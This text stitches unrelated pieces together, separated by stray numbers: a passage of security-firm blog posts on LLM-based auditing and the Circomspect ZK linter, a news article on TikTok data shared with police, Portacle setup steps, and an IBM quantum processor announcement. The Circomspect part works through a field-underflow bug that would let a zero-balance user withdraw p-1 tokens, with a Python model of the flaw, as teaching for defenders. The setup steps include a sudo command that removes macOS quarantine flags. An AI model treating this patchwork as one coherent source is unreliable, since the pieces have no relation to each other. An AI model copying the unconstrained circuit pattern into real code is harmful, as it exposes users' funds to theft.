false positives/false negatives, with some overlap (Figure 1). Codex was not able to effectively reduce the false positive rate from a prototype Slither integer overflow detector. Overall, we noticed a tendency to reply affirmatively to our questions, increasing the number of positives discovered by Toucan. Codex can perform basic static analysis tasks, but the rate of failure is too high to be useful and too difficult to characterize. This capability to perform successful analysis, even on short program fragments, is very impressive and should not be discounted! For languages that Codex understands but for which no suitable tooling exists, this capability could be extremely valuable—after all, some analysis could be much better than nothing. But the benchmark for Solidity is not nothing; we already have existing static analysis tooling that works very well. How we framed our framework During Toucan’s development, we created a custom prompting framework, a web-based front end, and rudimentary debugging and testing tools to evaluate prompts and to aid in unit and integration tests. The most important of these was the prompting framework. Prompting framework If we were making Toucan today, we’d probably just use LangChain. But at the time, LangChain did not have the features we needed. Frustratingly, neither OpenAI nor Microsoft offered an official, first-party prompting framework. 
This led us to develop a custom framework, with the goal that it should be possible for auditors to create new prompts without ever modifying Toucan’s code. requires = [“emit-ownership-doc”, “emit-target-contract”,] name = “Contract Ownership” scope = “contract” instantiation_condition = “any(‘admin’ in s.name.lower() or ‘owner’ in s.name.lower() for s in contract.state_variables)” [[questions]] name = “can-change” query = “Is it possible to change the `{{ contract | owner_variable }}` variable by calling a function in the `{{ contract.name }}` contract without aborting the transaction? Think through it step by step, and answer as ‘Yes’, ‘No’, or ‘Unknown’. If ‘Yes’, please specify the function.” is_decision = true [[questions]] name = “who-can-call” runtime_condition = “questions[‘can-change’].is_affirmative()” query = “””To reason about ownership: 1) First, carefully consider the code of the function 2) Second, reason step by step about the question. Who can call the function successfully, that is, without aborting or revering the transaction?””” answer_start = “””1) First, carefully consider the code of the function:””” [[questions]] name = “can-non-owner-call” runtime_condition = “questions[‘can-change’].is_affirmative()” query = “Can any sender who is not the current owner call the function without reverting or aborting?” is_decision = true finding_condition = “question.is_affirmative()” Figure 2: Sample question chain asking about contract ownership. Before questions are emitted, the prompting framework also emits a specific explanation of what ownership means, with examples and information about the target contract. Our framework supported chaining multiple questions together to support Chain of Thought and similar prompting techniques (Figure 2). Since GPT models like Codex are multi-shot learners, our framework also supported adding background information and examples before forming a prompt. The framework also supported filtering on a per-question basis, as there may also be some questions relevant only to specific kinds of contracts (say, only ERC-20 tokens), and others questions may have a specific scope (e.g., a contract, function, or file scope). Finally, each question could be optionally routed to a different model. The prompting framework also took great lengths to abide by OpenAI’s API limitations, including batching questions into one API invocation and keeping track of both the token count and API invocation rate limits. We hit these limits often and were very thankful the Codex model was free while in beta. Test data One of our development goals was that we would never compromise customer data by sending it to an OpenAI API endpoint. We had a strict policy of running Toucan only against open-source projects on GitHub (which would already have been indexed by Codex) with published reports, like those on our Publications page). We were also able to use the rather extensive test set that comes with Slither, and our “building secure contracts” reference materials as additional test data. It is important to note that some of these tests and reference materials may have been a part of the Codex training set, which explains why we saw very good results on smaller test cases. The missing tools The lack of tooling from both OpenAI and Microsoft has been extremely disappointing, although that looks to be changing: Microsoft has a prompting library, and OpenAI recently released OpenAI Evals. 
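To make the question chain in Figure 2 a bit more concrete, the sketch below shows roughly what driving such a chain against a completion API looks like. This is not Toucan's implementation: it assumes the pre-1.0 openai Python package, and the model name, prompts, and helper names are placeholders.

```python
"""Rough sketch of a two-step question chain against a completion API."""
import openai  # assumes the pre-1.0 openai package with Completion.create

def ask(prompt, model="code-davinci-002"):
    resp = openai.Completion.create(
        model=model, prompt=prompt, max_tokens=256, temperature=0.0
    )
    return resp.choices[0].text.strip()

def ownership_chain(contract_source, owner_var="owner"):
    context = contract_source + "\n\n"
    decision = ask(
        context
        + f"Is it possible to change the `{owner_var}` variable by calling a "
        "function in this contract without aborting the transaction? "
        "Think through it step by step, then answer 'Yes', 'No', or 'Unknown'."
    )
    if not decision.lower().startswith("yes"):
        return []  # runtime condition not met; skip the follow-up question
    follow_up = ask(
        context + "Who can call that function without reverting the transaction?"
    )
    return [decision, follow_up]
```

Everything around this core loop, including batching, rate limiting, and evaluating the answers, had to be built by hand, which is where the missing tooling hurt the most.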
The kinds of tools we’d have loved to see include a prompt debugger; a tree-graph visualization of tokens in prompts and responses with logprobs of each token; tools for testing prompts against massive data sets to evaluate quality; ways to ask the same question and combine results from counterexamples; and some plugins to common unit testing frameworks. Surely someone is thinking of the developers and making these tools? Current programming languages lack the facilities for interfacing with neural architecture computers like LLMs or similar models. A core issue is the lack of capability to work with nondeterminism and uncertainty. When using LLMs, every answer has some built-in uncertainty: the outputs are inherently probabilistic, not discrete quantities. This uncertainty should be handled at the type system level so that one does not have to explicitly deal with probabilities until it is necessary. A pioneering project from Microsoft Research called Infer.NET does this for .NET-based languages, but there seem to be few concrete examples and no real tooling to combine this with LLMs. Prompt engineering, and surrounding tooling, are still in their infancy. The biggest problem is that you never know when you are done: even now, it is always possible that we were just one or two prompts away from making Toucan a success. But at some point, you have to give up in the face of costs and schedules. With this in mind, the $300K salary for a fantastic prompt engineer does not seem absurd: if the only difference between a successful LLM deployment and a failure is a few prompts, the job quickly pays for itself. Fundamentally, though, this reflects a lack of tooling to assess prompt quality and evaluate responses. There is no particularly good way to determine if one prompt is better than another or if you’re on the right track. Similarly, when a prompt fails against an input, it is frustratingly difficult to figure out why and to determine, programmatically, which prompts are merely returning the wrong result versus completely hallucinating and misbehaving. Unit tests are also problematic; the results are not guaranteed to be the same across runs, and newer models may not provide the same results as prior ones. There is certainly a solution here, but again, the tooling developers expect just wasn’t present. OpenAI Evals is likely going to improve this situation. Overall, the tooling ecosystem is lacking, and surprisingly, the biggest names in the field have not released anything substantial to improve the adoption and integration of LLMs into real software projects that people use. However, we are excited that the open source community is stepping up with really cool projects like LangChain and LlamaIndex. Humans still reign supreme OpenAI’s Codex is not yet ready to take over the job of software security auditors. It lacks the ability to reason about the proper concepts and produces too many false positives for practical usage in audit tasks. However, there is clearly a nascent capability to perform interesting analysis tasks, and underlying models should quickly get more capable. We are very excited to keep using the technology as it improves. For example, the new larger context window with GPT-4 may allow us to provide enough context and direction to handle complex tasks. Even though Codex (and GPT-4) do not currently match mature algorithmic-based tools, LLM-based tools—even those of lower quality—may have interesting uses. 
For languages for which no analysis tooling exists, developers can bootstrap something from LLMs relatively quickly. The ability to provide some reasonable analysis where none previously existed may be considerably better than nothing at all. We hope the ability to integrate language models into existing programs improves quickly, as there is currently a severe lack of languages, libraries, type systems, and other tooling for the integration of LLMs into traditional software. Disappointingly, the main organizations releasing LLMs have not released much tooling to enable their use. Thankfully, open-source projects are filling the gap. There is still enormous work to be done, and whoever can make a wonderful developer experience working with LLMs stands to capture developer mindshare. LLM capability is rapidly improving, and if it continues, the next generation of LLMs may serve as capable assistants to security auditors. Before developing Toucan, we used Codex to take an internal blockchain assessment occasionally used in hiring. It didn’t pass—but if it were a candidate, we’d ask it to take some time to develop its skills and return in a few months. It did return—we had GPT-4 take the same assessment—and it still didn’t pass, although it did better. Perhaps the large context window version with proper prompting could pass our assessment. We’re very eager to find out! By Fredrik Dahlgren, Principal Security Engineer strong We have released version 0.8.0 of Circomspect, our static analyzer and linter for Circom. Since our initial release of Circomspect in September 2022, we have added five new analysis passes, support for tags, tuples, and anonymous components, links to in-depth descriptions of each identified issue, and squashed a number of bugs. Please download the new version and tell us what you think! New analysis passes The new analysis passes, added to the tool’s initial nine, check for a range of issues that could occur in Circom code: Failure to properly constrain intermediate signals Failure to constrain output signals in instantiated templates Failure to constrain divisors in division operations to nonzero values Use of BN254-specific templates from Circomlib with a different curve Failure to properly constrain inputs to Circomlib’s LessThan circuit Apart from finding the issue related to the Circomlib LessThan circuit discussed below, these analysis passes would also have caught the “million dollar ZK bug” recently identified by Veridise in the circom-pairing library. To understand the types of issues that Circomspect can identify, let’s dig into the final example in this list. This analysis pass identifies an issue related to the LessThan circuit implemented by Circomlib, the de facto standard library for Circom. To fully understand the issue, we first need to take a step back and understand how signed values are represented by Circom. Signed arithmetic in GF(p) Circom programs operate on variables called signals, which represent elements in the finite field GF(p) of integers modulo a prime number p. It is common to identify the elements in GF(p) with the unsigned integers in the half-open interval [0, p). However, it is sometimes convenient to use field elements to represent signed quantities in the same way that we may use the elements in [0, 232) to represent signed 32-bit integers. 
Mirroring the definition for two’s complement used to represent signed integer values, we define val(x) as follows: We then say that a is less than b in GF(p) if val(a) < val(b) as signed integers. This means that q = floor(p/2) is the greatest signed value representable in GF(p), and that -q = q + 1 is the least signed value representable in GF(p). It also means, perhaps somewhat surprisingly, that q + 1 is actually less than q. This is also how the comparison operator < is implemented by the Circom compiler. As usual, we say that a is positive if a > 0 and negative if a < 0. One way to ensure that a value a is nonnegative is to restrict the size (in bits) of the binary representation of a. In particular, if the size of a is strictly less than log(p) - 1 bits, then a must be less than or equal to q and, therefore, nonnegative. Circomlib’s ‘LessThan’ template With this out of the way, let’s turn our attention to the LessThan template defined by Circomlib. This template can be used to constrain two input signals a and b to ensure that a < b, and is implemented as follows: Looking at the implementation, we see that it takes an input parameter n and two input signals in[0] and in[1], and it defines a single output signal out. Additionally, the template uses the Num2Bits template from Circomlib to constrain the output signal out. The Num2Bits template from Circomlib takes a single parameter n and can be used to convert a field element to its n-bit binary representation, which is given by the array out of size n. Since the size of the binary representation is bounded by the parameter n, the input to Num2Bits is also implicitly constrained to n bits. In the implementation of LessThan above, the expression (1 << n) + in[0] - in[1] is passed as input to Num2Bits, which constrains the absolute value |in[0] - in[1]| to n bits. To understand the subtleties of the implementation of the LessThan template, let’s first consider the expected use case when both inputs to LessThan are at most n bits, where n is small enough to ensure that both inputs are nonnegative. We have two cases to consider. If in[0] < in[1], then in[0] - in[1] is a negative n-bit value, and (1 << n) + in[0] - in[1] is a positive n-bit value. It follows that bit n in the binary representation of the input to Num2Bits is 0, and thus out must be equal to 1 - 0 = 1. On the other hand, if in[0] ≥ in[1], then in[0] - in[1] is a nonnegative n-bit value (since both inputs are positive), and (1 << n) + in[0] - in[1] is a positive (n + 1)-bit value with the most significant bit equal to 1, It follows that bit n in the binary representation of the input to Num2Bits is 1, and out must be given by 1 - 1 = 0. This all makes sense and gives us some confidence if we want to use LessThan for range proofs in our own circuits. However, things become more complicated if we forget to constrain the size of the inputs passed to LessThan. Using signals to represent unsigned quantities To describe the first type of issue that may affect circuits defined using LessThan, consider the case in which signals are used to represent unsigned values like monetary amounts. Say that we want to allow users to withdraw funds from our system without revealing sensitive information, like the total balance belonging to a single user or the amounts withdrawn by users. 
We could use LessThan to implement the part of the circuit that validates the withdrawn amount against the total balance as follows: Now, suppose that a malicious user with a zero balance decides to withdraw p - 1 tokens from the system, where p is the size of the underlying prime field. Clearly, this should not be allowed since p - 1 is a ridiculously large number and, in any case, the user has no tokens available for withdrawal. However, looking at the implementation of LessThan, we see that in this case, the input to Num2Bits will be given by (1 << 64) + (p - 1) - (0 + 1) = (1 << 64) - 2 (as all arithmetic is done modulo p). It follows that bit 64 of the binary representation of the input will be 0, and the output from LessThan will be 1 - n2b.out[64] = 1 - 0 = 1. This also means that ValidateWithdrawal will identify the withdrawal as valid. The problem here is that p - 1 also represents the signed quantity –1 in GF(p). Clearly, -1 is less than 1, and we have not constrained the withdrawn amount to be nonnegative. Adding a constraint restricting the size of the amount to be less than log(p) - 1 bits would ensure that the amount must be positive, which would prevent this issue. More generally, since the input parameter n to LessThan restricts only the size of the difference |in[0] - in[1]|, we typically cannot use LessThan to prevent overflows and underflows. This is a subtle point that many developers miss. As an example, consider the section on arithmetic overflows and underflows from the zero-knowledge (ZK) bug tracker maintained by 0xPARC. In an earlier version, 0xPARC suggested using LessThan to constrain the relevant signals in an example that was almost identical to the vulnerable ValidateWithdrawal template defined above! Another vulnerability of this type was found by Daira Hopwood in an early version of the ZK space-conquest game Dark Forest. Here, the vulnerability allowed users to colonize planets far outside the playing field. The developers addressed the issue by adding a range proof based on the Num2Bits template that restricted the size of the coordinates to 31 bits. Using signals to represent signed quantities Now, suppose signals are used to represent signed quantities. In particular, let’s consider what would happen if we passed q = floor(p/2) and q + 1 as inputs to LessThan. We will show that even though q + 1 < q according to the Circom compiler, q is actually less than q + 1 according to LessThan. Returning to the input to Num2Bits in the definition of LessThan, we see that if in[0] = q and in[1] = q + 1, the input to Num2Bits is given by the following expression: (1 << n) + in[0] - in[1] = (1 << n) + q - (q + 1) = (1 << n) - 1 It follows that the nth bit in the binary representation of this value is 0, and the output from LessThan is 1 - n2b.out[n] = 1 - 0 = 1. Thus, q < q + 1 according to LessThan, even though q + 1 < q according to the compiler! It is worth reiterating here that the input parameter n to LessThan does not restrict the size of the inputs, only the absolute value of their difference. Thus, we are free to pass very large (or very small) inputs to LessThan. Again, this issue can be prevented if the size of both of the inputs to the LessThan template are restricted to be less than log(p) - 1 bits. Circomspect to the rescue (part 1) To find issues of this type, Circomspect identifies locations where LessThan is used. 
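Before looking at what Circomspect checks, it may help to reproduce both failure modes outside of Circom. The Python sketch below models the field arithmetic behind LessThan; the prime is the BN254 scalar field that Circom uses by default, and the helper names are ours, not Circomlib's.

```python
# Circom's default prime: the BN254 scalar field modulus.
P = 21888242871839275222246405745257275088548364400416034343698204186575808495617
Q = P // 2  # the greatest "signed" value representable in GF(p)

def val(x):
    """Signed value represented by x: x if x <= floor(p/2), else x - p."""
    return x if x <= Q else x - P

def less_than(a, b, n=64):
    """Model of LessThan(n): out = 1 - (bit n of (2^n + a - b) mod p)."""
    diff = (pow(2, n) + a - b) % P
    return 1 - ((diff >> n) & 1)

# Unsigned view: a "withdrawal" of p - 1 tokens against a total balance of 0.
amount, total = P - 1, 0
print(less_than(amount, total + 1))  # 1 -- the bogus withdrawal is accepted

# Signed view: the compiler says q + 1 < q (since val(q + 1) == -q), but LessThan disagrees.
print(val(Q + 1), less_than(Q, Q + 1))  # -q and 1 -- LessThan says q < q + 1
```

Both calls print 1: the bogus withdrawal passes the check, and q is reported as less than q + 1. Circomspect's new analysis pass is aimed at exactly these unconstrained uses of LessThan.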
It then tries to see whether the inputs to LessThan are constrained to less than log(p) - 1 bits using the Num2Bits template from Circomlib, and it emits a warning if it finds no such constraints. This allows the developer (or reviewer) to quickly identify locations in the codebase that require further review. As shown in the screenshot above, each warning from Circomspect will now typically also contain a link to a description of the potential issue, and recommendations for how to resolve it. Circomspect to the rescue (part 2) We would also like to mention another of our new analysis passes. The latest version of Circomspect identifies locations where a template is instantiated but the output signals defined by the template are not constrained. As an example, consider the ValidateWithdrawal template introduced above. Suppose that we rewrite the template to include range proofs for the input signals amount and total. However, during the rewrite we accidentally forget to include a constraint ensuring that the output from LessThan is 1. This means that users may be able to withdraw amounts that are greater than their total balance, which is obviously a serious vulnerability! There are examples (like Num2Bits) in which a template constrains its inputs and no further constraints on the outputs are required. However, forgetting to constrain the output from a template generally indicates a mistake and requires further review to determine whether it constitutes a vulnerability. Circomspect will flag locations where output signals are not constrained to ensure that each location can be manually checked for correctness. Let’s talk! We at Trail of Bits are excited about contributing to the growing range of tools and libraries for ZK that have emerged in the last few years. If you are building a project using ZK, we would love to talk to you to see if we can help in any way. If you are interested in having your code reviewed by us, or if you’re looking to outsource parts of the development to a trusted third party, please get in touch with our team of experienced cryptographers. Tl;dr: Trail of Bits has launched a practice focused on machine learning and artificial intelligence, bringing together safety and security methodologies to create a new risk assessment and assurance program. This program evaluates potential bespoke risks and determines the necessary safety and security measures for AI-based systems. If you’ve read any news over the past six months, you’re aware of the unbridled enthusiasm for artificial intelligence. The public has flocked to tools built on systems like GPT-3 and Stable Diffusion, captivated by how they alter our capacity to create and interact with each other. While these systems have amassed headlines, they constitute a small fraction of AI-based systems that are currently in use, powering technology that is influencing outcomes in all aspects of life, such as finance, healthcare, transportation and more. People are also attempting to shoehorn models like GPT-3 into their own applications, even though these models may introduce unintended risks or not be adequate for their desired results. Those risks will compound as the industry moves to multimodal models. With people in many fields trying to hop on the AI bandwagon, we are dealing with security and safety issues that have plagued the waves of innovation that have swept through society in the last 50 years. 
This includes issues such as proper risk identification and quantification, responsible and coordinated vulnerability disclosures, and safe deployment strategies. In the rush to embrace AI, the public is at a loss as to the full scope of its impact, and whether these systems are truly safe. Furthermore, the work seeking to map, measure, and mitigate against newfound risks has fallen short, due to the limitations and nuances that come with applying traditional measures to AI-based systems. The new ML/AI assurance practice at Trail of Bits aims to address these issues. With our forthcoming work, we not only want to ensure that AI systems have been accurately evaluated for potential risk and safety concerns, but we also want to establish a framework that auditors, developers and other stakeholders can use to better assess potential risks and required safety mitigations for AI-based systems. Further work will build evaluation benchmarks, particularly focused on cybersecurity, for future machine-learning models. We will approach the AI ecosystem with the same rigor that we are known to apply to other technological areas, and hope the services transform the way practitioners in this field work on a daily basis. In a paper released by Heidy Khlaaf, our engineering director of ML/AI assurance, we propose a novel, end-to-end AI risk framework that incorporates the concept of an Operational Design Domain (ODD), which can better outline the hazards and harms a system can potentially have. ODDs are a concept that has been used in the autonomous vehicle space, but we want to take it further: By having a framework that can be applied to all AI-based systems, we can better assess potential risks and required safety mitigations, no matter the application. We also discuss in the paper: When “safety” doesn’t mean safety: The AI community has conflated “requirements engineering” with “safety measures,” which is not the same thing. In fact, it’s often contradictory! The need for new measures: Risk assessment practices taken from other fields, i.e. hardware safety, don’t translate well to AI. There needs to be more done to uncover design issues that directly lead to systematic failures. When “safety” doesn’t mean “security”: The two terms are not interchangeable, and need to be assessed differently when applied to AI and ML systems. It hasn’t been all bad: The absence of well-defined operational boundaries for general AI and ML models has made it difficult to accurately assess the associated risks and safety, given the vast number of applications and potential hazards. We discuss what models can be adapted, specifically those that can ensure security and reliability. The AI community, and the general public, will suffer the same or worse consequences we’ve seen in the past if we cannot safeguard the systems the world is rushing to adopt. In order to do so, it’s essential to get on the same page when it comes to terminology and techniques for safety objectives and risk assessments. However, we don’t need to reinvent the wheel. Applicable techniques already exist; they just need to be adapted to the AI and machine-learning space. With both this paper and our practice’s forthcoming work, we hope to bring clarity and cohesion to AI assurance and safety, in the hope that it can counter the marketing hype and exaggerated commercial messaging in the current marketplace that deemphasizes the security of this burgeoning technology. 
This approach builds on our previous machine-learning work, and is just the beginning of our efforts in this domain. Any organizations interested in working with this team can contact Trail of Bits to inquire about future projects.
42
Leaked Documents Reveal What TikTok Shares with Authorities – IN the U.S.
President Donald Trump's executive order banning Americans from using TikTok is driven by concerns that the company might hand over user data to Chinese authorities. Recently hacked police documents reveal the nature of the company's relationship to law enforcement — not in China but in the United States.

TikTok's parent company, ByteDance, is headquartered in Beijing, where the government censors social media content and maintains other forms of influence over tech companies. But a glimpse at what TikTok does in the U.S. underscores that data privacy issues extend beyond China. Documents published in the BlueLeaks trove, which was hacked by someone claiming a connection to Anonymous and published by the transparency collective Distributed Denial of Secrets, show the information that TikTok shared with U.S. law enforcement in dozens of cases. Experts familiar with law enforcement requests say that what TikTok collects and hands over is not significantly more than what companies like Amazon, Facebook, or Google regularly provide, but that's because U.S. tech companies collect and hand over a lot of information.

The documents also reveal that two representatives with bytedance.com email addresses registered on the website of the Northern California Regional Intelligence Center, a fusion center that covers the Silicon Valley area. And they show that the Federal Bureau of Investigation and Department of Homeland Security actively monitored TikTok for signs of unrest during the George Floyd protests.

The number of requests for subscriber information that TikTok says it receives from law enforcement is significantly lower than what U.S. tech giants reportedly field, likely because police are more accustomed to using data from U.S. companies and apps in investigations. TikTok enumerates its requests from law enforcement in a biannual transparency report, the most recent of which says that for the last half of 2019, the company received 100 requests covering 107 accounts. It handed over information in 82 percent of cases. Facebook, by contrast, says it received a whopping 51,121 requests over the same period, and handed over at least some data in 88 percent of cases.

A 2018 document found in BlueLeaks titled "Law Enforcement Technology Investigations Resource Guide" gives police details on how to obtain records from Musical.ly, which was acquired by ByteDance and merged into TikTok that year. In the releases shown in BlueLeaks, TikTok handed over multiple IP addresses, information about the devices used to register for accounts, cellphone numbers, and unique IDs tied to platforms including Instagram, Facebook, or Google if the user logged in using a social media account. (Business Insider first reported the specifics of what TikTok collects.) It is unclear whether these data releases were in response to warrants, subpoenas, or other requests, and the company would not give details, citing user privacy.

All social media platforms are required by law to comply with valid court orders requesting user information, but what they actually provide can vary widely, said Ángel Díaz, an expert on national security and technology at the Brennan Center for Justice. Companies also have the right to challenge requests for user data in court — though they often don't do so. The accounts for which TikTok handed over data in the BlueLeaks dump range from influencers with tens of thousands of followers to people who primarily post for friends.
One user contacted by The Intercept said they were unaware that their information had been given to law enforcement. Díaz said that in certain emergency situations, where moderators have a good-faith belief that there is a threat to someone’s life or a risk of serious physical harm, tech companies may voluntarily turn over information to the U.S. government without notifying the user. TikTok restored access to the account after The Intercept asked the company about it. “We are committed to respecting the privacy and rights of our users when complying with law enforcement requests,” said TikTok spokesperson Jamie Favazza. “We carefully review valid law enforcement requests and require appropriate legal documents in order to produce information for a law enforcement request.” TikTok has tried to distance itself from its Chinese origins, hiring a former Disney executive as CEO, engaging lobbyists with ties to the Trump campaign, and pledging to add 10,000 positions in the United States. Some of that expansion is apparently coming in the area of cooperation with authorities. TikTok recently sought out a law enforcement response specialist and is currently recruiting a global law enforcement project manager. The team that reviews law enforcement requests is based in Los Angeles, Favazza said. The BlueLeaks documents also indicate that U.S. federal investigators and police — some of whom are themselves enthusiastic TikTok users — increasingly view the app as a useful tool. In the early days of the George Floyd protests, law enforcement used TikTok, along with Facebook, Twitter, and other social media apps, to track protests and dissent. An FBI report from June 2 titled “Civil Unrest May 2020 Situation Report” alleged that TikTok was among the apps being used to promote violence. “Reporting nationally indicates individuals are using traditional social medial platforms and encrypted messaging applications (YouTube, Facebook, Twitter, Instagram, TikTok, Telegram, Topbuzz.com, Snapchat, Wickr) to discuss potential acts of violence.” In lieu of actual examples of physical violence, the document pointed to the doxxing of officers, “rumors about false activities,” and, cryptically, “false reports of violence to incite violence.” Three days later, another FBI dispatch warned, “An identified user posted a video on TikTok demonstrating which tab to pull to quickly remove body armor of LEO/military, saying ‘do with this information what you will.’ The post was gaining significant traction.” One satirical TikTok video even got a dedicated intelligence report, from DHS’s Office of Intelligence and Analysis. On May 31, a 19-year-old TikTok user who goes by the handle weirdsappho posted a video riffing off a tweet that comedian Jaboukie Young-White, a correspondent for “The Daily Show,” wrote after the National Guard was deployed to Minneapolis. Young-White tweeted, “thank god they’re bringing in the army,” at a moment when anxiety about the deployment was running high. “I would be heartbroken if someone disabled a tank by putting water balloons filled w sticky liquids (esp some sort of sugar/milk/syrup combo) into a glass jar and throwing it at the windshield, rendering it inoperable support our troops.” In her video, weirdsappho included some of the replies to the tweet, which expanded on the joke. The DHS report reprised weirdsappho’s video, quoting the tweet and the replies verbatim, without explaining their source or giving context. 
The intelligence report bore the subject line “Social media video provides TTPs” — tactics, techniques, and procedures — “on how to interfere with the U.S. National Guard during riots,” suggesting that the teenager was an imminent threat. The existence of the dispatch was first reported by the online news site Mainer. In last week’s executive order, Trump cited concerns that TikTok’s ownership by ByteDance could “allow the Chinese Communist Party access to Americans’ personal and proprietary information.” TikTok’s track record, and ByteDance’s obligations under Chinese law, do present unique security concerns. The Chinese state has invested significant resources in using artificial intelligence to monitor and manipulate public opinion, and ByteDance has been brought along in that effort. ByteDance recently established a joint venture with a Chinese state media group, leaving open the possibility that some of its technology might be used for propaganda purposes. TikTok’s privacy policy states that the company may share user information with “a parent, subsidiary, or other affiliate of our corporate group.” Multiple class-action lawsuits have accused TikTok of sending data to China, though TikTok says that the data of U.S. users is stored in Virginia and backed up in Singapore. TikTok has also censored political speech that is disfavored by the Chinese government, including videos about the Hong Kong protests and about the internment in inhumane camps in northwestern China of Uyghurs, an oppressed Muslim minority group. Internal documents previously obtained by The Intercept show that TikTok instructed moderators to suppress posts created by users who were deemed poor, ugly, or disabled. The guides appeared to have been hastily translated from Chinese. “The common concern, whether we’re talking about TikTok or Huawei, isn’t the intentions of that company necessarily but the framework within which it operates,” said Elsa Kania, an expert on Chinese technology at the Center for a New American Security. “You could criticize American companies for having an opaque relationship to the U.S. government, but there definitely is a different character to the ecosystem.” At the same time, she added, the Trump administration’s actions, including a handling of Portland protests that brought to mind the police crackdown in Hong Kong, have undercut official critiques of Chinese practices: “At a moment when we’re seeing attempts by the administration to draw a contrast in terms of values and ideology with China, these eerie parallels that keep recurring do really undermine that.” Last week’s executive order takes effect 45 days after its issuance. Trump appears to favor ByteDance selling TikTok to an American owner, with Microsoft being the frontrunner. If that happens, some concerns about data privacy with regards to China might be eliminated. But the BlueLeaks documents highlight that without more restrictions in the United States on what companies can collect and hand over to investigators, there’s reason to worry about any social media platform, American or Chinese.
2
Portacle: A Portable Common Lisp Development Environment
Portacle is rather straightforward to set up and use. All you need to do is extract an archive. After that, you can freely move its installation folder around and even take it with you on a memory stick. If you are new to Emacs, Lisp, or both, you should also read the section after this one once you have successfully completed the installation.

Windows

Download the latest release and run it. It will ask you where to install it to, defaulting to your home folder. Note that you do not need to append portacle to the end of the path. After extraction, you can launch it by double-clicking portacle.exe. Note that portacle.exe is tied to the portacle directory and needs everything within it to function properly. You can, however, create a shortcut to the exe to reach it more easily from your desktop.

Mac OS X

Download the latest release, open the disk image, and move the portacle folder to a directory such as /Applications for easy access. Due to "security" reasons on macOS, you'll then need to run sudo xattr -dr com.apple.quarantine /Applications/portacle (replace /Applications with whatever path you moved your portacle directory to) in order to remove the quarantine attribute from all files in the portacle directory. This will allow you to open the application without security warnings/confirmations. You may see several xattr: No such file errors, which can be safely ignored. Note that you cannot copy the Portacle.app outside of the portacle directory. You must take the whole directory with you. You can, however, drag the app into your dock to create a shortcut.

Linux

Download the latest release and extract it. You can then launch it by double-clicking portacle.desktop. The file may also be presented to you as just Portacle. Note that you cannot move or copy portacle.desktop elsewhere. It has to reside in the portacle directory for it to work.
4
IBM Quantum breaks the 100‑qubit processor barrier
Today, IBM Quantum unveiled Eagle, a 127-qubit quantum processor. Eagle is leading quantum computers into a new era — we've launched a quantum processor that has pushed us beyond the 100-qubit barrier. We anticipate that, with Eagle, our users will be able to explore uncharted computational territory — and experience a key milestone on the path towards practical quantum computation.

We view Eagle as a step in a technological revolution in the history of computation. As quantum processors scale up, each additional qubit doubles the amount of space complexity — the amount of memory space required to execute algorithms — for a classical computer to reliably simulate quantum circuits. We hope to see quantum computers bring real-world benefits across fields as this increase in space complexity moves us into a realm beyond the abilities of classical computers. While this revolution plays out, we hope to continue sharing our best quantum hardware with the community early and often. This approach allows IBM and our users to work together to understand how best to explore and develop on these systems to achieve quantum advantage as soon as possible.

Constructing a processor that breaks the hundred-qubit barrier wasn't something we could do overnight. Scientists for decades have theorized that a computer based on the same mathematics followed by subatomic particles — quantum mechanics — could outperform classical computers at simulating nature. However, constructing one of these devices is an enormous challenge. Qubits can decohere — or forget their quantum information — with even the slightest nudge from the outside world. Producing Eagle on our short timeline was possible in part thanks to IBM's legacy of pioneering new science and investing in core hardware technology, including processes for reliable semiconductor manufacturing and packaging and bringing nascent products to market. Eagle's qubit count feat represents an important milestone on our IBM Quantum Roadmap. Eagle demonstrates how our team is solving challenges across hardware and software to eventually realize a quantum computer capable of solving practical problems in fields from renewable energy to finance and more.

Quantum computation at scale

IBM Quantum's Eagle processors contain nearly twice the qubits of our 65-qubit Hummingbird processor — but building something bigger takes more work than adding more qubits. We had to combine and improve upon techniques developed in previous generations of IBM Quantum processors in order to develop a processor architecture, including advanced 3D packaging techniques that we're confident can form the backbone of processors up to and including our planned 1,000+ qubit Condor processor.

Eagle is based on our heavy-hexagonal qubit layout as debuted with our Falcon processor, where qubits connect with either two or three neighbors as if sitting upon the edges and corners of tessellated hexagons. This particular connectivity decreased the potential for errors caused by interactions between neighboring qubits — providing significant boosts in yielding functional processors. Eagle also incorporates readout multiplexing as featured in our Hummingbird R2. Previous processors required a set of control and readout electronics for each qubit — this is manageable for a few dozen qubits, but would be far too bulky for 100+, let alone 1,000+ qubit processors.
Readout multiplexing allows us to drastically reduce the amount of electronics and wiring required inside of the dilution refrigerator. Perhaps most importantly, Eagle incorporates past IBM expertise in classical processor fabrication to provide scalable access wiring to all qubits. What do we mean? Quantum processors require a tangle of wiring that we must route outward to their edges. However, 3D integration allows us to place particular microwave circuit components and wiring on multiple physical levels. While packaging qubits remains one of the largest challenges for future quantum computers, multi-level wiring and other components provide the techniques that make possible the path toward Condor, with minimal impact to individual qubits' performance.

There's work yet to be done. The scale of a quantum chip is just one of three metrics that we use to measure the performance of a quantum processor, and we must continue to push the quality and speed of our processors by benchmarking their Quantum Volume and Circuit Layer Operations Per Second (CLOPS), respectively.

A modular paradigm: IBM Quantum System Two

As we continue scaling our chips, we expect them to mature beyond the infrastructure of IBM Quantum System One. Therefore, we're excited to unveil a concept for the future of quantum computing systems: IBM Quantum System Two. Central to IBM Quantum System Two will be modularity. With this system, we're giving flexibility to our hardware to continue to increase the scale of our chips. The team is taking a holistic systems approach to understand the necessary resources to support not only our upcoming Osprey and Condor processors, but also quantum processors into the future, as we continue to progress along our hardware roadmap. System Two introduces a new generation of scalable qubit control electronics together with higher-density cryogenic components and cabling. Furthermore, we are working jointly with Bluefors to re-imagine the cryogenic platform. Bluefors' new cryogenic platform and its novel structural design optimizes space inside of the fridge in order to accommodate increased support hardware required by larger processors, while ensuring that engineers can easily access and service the hardware inside the fridge. This platform brings the possibility of providing a larger shared cryogenic workspace, opening the door to potential linking of quantum processors through novel interconnects.

We think that System Two represents a glimpse into the future of what quantum computing looks like — a true quantum data center. Breaking the 100-qubit barrier is an incredible feat from the IBM Quantum team, and we're looking forward to sharing Eagle and our other advances with the quantum computing community. There's more to come as we progress along our IBM Quantum roadmap, from increases in the speed of our processors to pursuing quantum advantage — perhaps even quicker than expected — with the help of high-performance computing resources. We hope you'll join us as we continue our journey, with the goal of scaling quantum computers into paradigm-shifting systems capable of solving some of the most pressing challenges the world faces today. Even grander things await.
